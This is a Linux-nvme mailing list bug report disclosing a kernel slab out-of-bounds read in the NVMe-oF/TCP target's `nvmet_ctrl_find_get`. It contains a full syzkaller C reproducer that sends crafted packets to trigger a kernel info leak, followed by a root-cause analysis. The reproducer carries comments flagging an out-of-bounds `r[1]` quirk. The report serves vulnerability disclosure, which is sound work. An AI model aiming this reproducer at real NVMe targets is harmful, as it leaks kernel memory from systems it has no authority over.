[Bug Report] NVMe-oF/TCP - Slab OOB Read in `nvmet_ctrl_find_get`
Alon Zahavi
zahavi.alon at gmail.com
Mon Nov 6 05:37:39 PST 2023
# Bug Overview
## Bug Summary
A slab out-of-bounds read happens during the execution of
`nvmet_ctrl_find_get`, when it reaches a `pr_warn()` call.
## Bug Location
`drivers/nvme/target/core.c` in the function `nvmet_ctrl_find_get`.
## Bug Class
Kernel Information Leak
## Disclaimer:
This bug was found using Syzkaller with added NVMe-oF/TCP support.
# Technical Details
## In a Few Words
Because a string is filled in without checking for a NUL terminator, a
later print of that string can cause a kernel info leak.
Although the bug can be triggered remotely, the info leak is local only,
because the leaked bytes are emitted by `pr_warn()` into the target's kernel log.
## Reproducer
DISCLAIMER: This reproducer was generated by Syzkaller, with some
optimizations by me.
```
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
// Holds the socket file descriptor: loop() stores the result of socket() in
// r[0] when the call does not return -1; otherwise the all-ones initial value
// is kept.
uint64_t r[1] = {0xffffffffffffffff};
// Replays the packet sequence of the reproducer: opens a socket, connects it,
// and issues four sendto() calls from buffers built at fixed addresses.
// Every address written here lies inside the 0x20000000 region that main()
// maps before calling loop(). The return values of connect() and sendto()
// are ignored.
void loop(void)
{
intptr_t res = 0;
// domain 2 / type 1 -- presumably AF_INET / SOCK_STREAM on Linux.
res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
if (res != -1)
r[0] = res;
// Socket address at 0x20000100 (passed to connect() with addrlen 0x10):
// family 2, port 0x1144 (4420) and address 0xc0a8eb8b (192.168.235.139),
// both stored big-endian. Presumably a struct sockaddr_in -- the layout is
// not spelled out here.
*(uint16_t*)0x20000100 = 2;
*(uint16_t*)0x20000102 = htobe16(0x1144);
*(uint32_t*)0x20000104 = htobe32(0xc0a8eb8b);
syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
// First send: a 0x80-byte buffer at 0x200001c0 made of a 16-byte header
// followed by 112 bytes of filler. The report describes this first sendto
// as the ICReq packet.
*(uint8_t*)0x200001c0 = 0;
*(uint8_t*)0x200001c1 = 0;
*(uint8_t*)0x200001c2 = 0x80;
*(uint8_t*)0x200001c3 = 0;
*(uint32_t*)0x200001c4 = 0x80;
*(uint16_t*)0x200001c8 = 0;
*(uint8_t*)0x200001ca = 0;
*(uint8_t*)0x200001cb = 0;
*(uint32_t*)0x200001cc = 0;
memcpy((void*)0x200001d0,
"\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
"\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
"\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
"\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\x86\xcf\xbf"
"\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
"\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
"\xcf\xbf\x35\x86\x00\x00\x00\x00\x00\x00",
112);
syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x88ul - 0x8ul,
/*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
// Second send: a header at 0x20000000, a pointer to 0x20000440 stored at
// 0x20000080, and an 841-byte payload at 0x20000440 (840 data bytes plus the
// string literal's terminating NUL).
*(uint8_t*)0x20000000 = 5;
*(uint8_t*)0x20000001 = 1;
*(uint8_t*)0x20000002 = 0;
*(uint8_t*)0x20000003 = 0x3f;
*(uint32_t*)0x20000004 = 0xbb7;
*(uint32_t*)0x20000008 = 0x7ff;
*(uint16_t*)0x20000010 = 4;
*(uint16_t*)0x20000012 = 0x81;
*(uint16_t*)0x20000014 = 7;
*(uint16_t*)0x20000016 = 5;
*(uint64_t*)0x20000080 = 0x20000440;
memcpy(
(void*)0x20000440,
"\x39\x1f\xcb\x1d\x48\xf0\x52\x9a\x1a\xed\x88\xfe\x10\xa6\x2b\xcd\xfe\xbd"
"\x3c\x87\xb7\x2d\x35\x8d\xb3\x14\x80\xcf\x0e\x51\x27\x71\x7b\xc2\x39\x93"
"\x1a\xa6\xce\xaf\xe2\x2a\x5a\x2f\x04\x06\x5f\x50\x32\x52\x04\xf0\x9a\x4b"
"\xac\xcc\x0d\x73\x9e\xb9\x60\x52\x4b\xe8\x47\xca\x3e\x9c\xaa\xdd\x50\x7d"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAB"
, 841);
// NOTE(review): the file-scope array r is declared with a single element, so
// r[1] indexes past its end. Every other call in this function uses r[0] --
// confirm whether r[0] was intended here.
syscall(__NR_sendto, /*fd=*/r[1], /*pdu=*/0x20000000ul, /*len=*/0x88ul,
/*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
// Third send: the buffer at 0x200001c0 is rebuilt with the byte 0x7f at
// offset 8. The report describes this as a "Fabric Command" with opcode 0x7f.
*(uint8_t*)0x200001c0 = 4;
*(uint8_t*)0x200001c1 = 0;
*(uint8_t*)0x200001c2 = 0x48;
*(uint8_t*)0x200001c3 = 0;
*(uint32_t*)0x200001c4 = 0x48;
*(uint8_t*)0x200001c8 = 0x7f;
*(uint8_t*)0x200001c9 = 0x40;
*(uint16_t*)0x200001ca = 0;
*(uint8_t*)0x200001cc = 1;
memset((void*)0x200001cd, 0, 19);
*(uint64_t*)0x200001e0 = 0;
*(uint32_t*)0x200001e8 = 0x400;
memcpy((void*)0x200001ec, "\x5f\x19\x6e", 3);
*(uint8_t*)0x200001ef = 1;
*(uint16_t*)0x200001f0 = 0;
*(uint16_t*)0x200001f2 = 4;
*(uint16_t*)0x200001f4 = 0;
*(uint8_t*)0x200001f6 = 0;
*(uint8_t*)0x200001f7 = 0;
*(uint32_t*)0x200001f8 = 0;
memset((void*)0x200001fc, 0, 12);
syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
/*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
// Fourth send: a mostly zeroed buffer at 0x200003c0 starting with the same
// 4 / 0 / 0x48 / 0 / 0x48 header values as the previous one. The length
// passed to sendto() is 0xfffffe7a, far larger than the bytes written here.
*(uint8_t*)0x200003c0 = 4;
*(uint8_t*)0x200003c1 = 0;
*(uint8_t*)0x200003c2 = 0x48;
*(uint8_t*)0x200003c3 = 0;
*(uint32_t*)0x200003c4 = 0x48;
*(uint8_t*)0x200003c8 = 0;
*(uint8_t*)0x200003c9 = 0;
*(uint16_t*)0x200003ca = 0;
*(uint32_t*)0x200003cc = 0;
*(uint64_t*)0x200003d0 = 0;
*(uint64_t*)0x200003d8 = 0;
*(uint64_t*)0x200003e0 = 0;
memcpy((void*)0x200003e8, "\x11\x25\xed", 3);
memcpy((void*)0x200003eb, "\x19\x15\x2c\x6a", 4);
*(uint8_t*)0x200003ef = 0;
*(uint32_t*)0x200003f0 = 0;
*(uint32_t*)0x200003f4 = 0;
*(uint32_t*)0x200003f8 = 0;
*(uint32_t*)0x200003fc = 0;
*(uint32_t*)0x20000400 = 0;
*(uint32_t*)0x20000404 = 0;
syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200003c0ul, /*len=*/0xfffffe7aul,
/*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
// Entry point: maps the fixed address range that loop() writes to, then runs
// loop() once. The 0x1000000-byte region at 0x20000000 is mapped with prot=7
// and is bracketed by one 0x1000-byte prot=0 mapping on each side --
// presumably guard pages. flags=0x32 is presumably
// MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS on Linux. The mmap() return values are
// not checked.
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
/*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
loop();
return 0;
}
```
## In More Details
### Tracing The Bug
In the reproducer above, the first `sendto` sends the ICReq
packet to the NVMe/TCP target. After that, we send another
“Fabric Command” with the opcode 0x7f,
along with some additional data. This additional data is 768 bytes that will
later be copied in the target to an SGL. The SGL’s data will later be
copied to an object of type `struct nvmf_connect_data` (Code Block 2)
during the execution of `nvmet_execute_io_connect` (Code Block 1).
Code Block 1:
```
static void nvmet_execute_io_connect(struct nvmet_req *req)
{
...
struct nvmf_connect_data *d; // 1
...
d = kmalloc(sizeof(*d), GFP_KERNEL);
if (!d) {
status = NVME_SC_INTERNAL;
goto complete;
}
status = nvmet_copy_from_sgl(req, 0, d, sizeof(*d)); // 2
if (status)
goto out;
...
ctrl = nvmet_ctrl_find_get(d->subsysnqn, d->hostnqn,
le16_to_cpu(d->cntlid), req); // 3
if (!ctrl) {
status = NVME_SC_CONNECT_INVALID_PARAM | NVME_SC_DNR;
goto out;
}
...
}
```
Code Block 2:
```
/*
 * Connect data as quoted in this report. nvmet_execute_io_connect() fills the
 * whole object from the SGL with nvmet_copy_from_sgl(). subsysnqn and hostnqn
 * are meant to hold strings, but that copy does not check them for a
 * terminating NUL.
 */
struct nvmf_connect_data {
uuid_t hostid;
__le16 cntlid;
char resv4[238];
char subsysnqn[NVMF_NQN_FIELD_LEN]; // NVMF_NQN_FIELD_LEN is 256
char hostnqn[NVMF_NQN_FIELD_LEN]; // NVMF_NQN_FIELD_LEN is 256
char resv5[256];
};
```
Code Block 1 Break Down:
1. The driver declares the variable d of type `struct
nvmf_connect_data` (See Code Block 2).
2. The driver uses `nvmet_copy_from_sgl` to copy the data from the SGL
to the variable `d`.
3. The driver calls the function `nvmet_ctrl_find_get` (Code block 3),
which will later on cause the slab OOB.
When filling `d`, the driver fills the entirety of `d`, including
`subsysnqn`, `hostnqn`, and `resv5`. We know that `subsysnqn` and
`hostnqn` are supposed to be strings, but when filling `d`,
`nvmet_copy_from_sgl` ignores that fact and does not check whether
those strings contain a NUL terminator.
When the execution reaches the function `nvmet_ctrl_find_get`, if
`nvmet_find_get_subsys` does not find the subsystem NQN and therefore
returns NULL, a warning is printed, dereferencing `subsysnqn`
(which points to `d->subsysnqn`) as a string. Because we already know
that `d->subsysnqn` is not NUL-terminated, the print operation runs
past the end of the field and prints `d->hostnqn` as well, and can even
continue into `d->resv5`. The print continues until the first
NUL byte is reached. This behaviour will most likely cause an info
leak of kernel addresses, because `d` is allocated from the `kmalloc-1k`
slab cache, so the read can run into the next object in memory.
Code Block 3:
```
struct nvmet_ctrl *nvmet_ctrl_find_get(const char *subsysnqn,
const char *hostnqn, u16 cntlid,
struct nvmet_req *req)
{
struct nvmet_ctrl *ctrl = NULL;
struct nvmet_subsys *subsys;
subsys = nvmet_find_get_subsys(req->port, subsysnqn); // 1
if (!subsys) {
pr_warn("connect request for invalid subsystem %s!\\n", subsysnqn); // 2
req->cqe->result.u32 = IPO_IATTR_CONNECT_DATA(subsysnqn);
goto out;
}
...
}
```
Another thing to point out is the function `nvmf_connect_data_prep`.
There, both `subsysnqn` and `hostnqn` are initialized using
`strncpy` with a maximum size of `NVMF_NQN_SIZE`, a macro defined
as 223, the actual maximum length of an NQN
name.
Code Block 4:
```
// From `include/linux/nvme.h`
/* NQN names in commands fields specified one size */
#define NVMF_NQN_FIELD_LEN 256
/* However the max length of a qualified name is another size */
#define NVMF_NQN_SIZE 223
```
## Root Cause
As explained above, the root cause for this bug is the fact that there
are no NULL terminators to the strings in the object representing the
`struct nvmf_connect_data`.
More information about the Linux-nvme
mailing list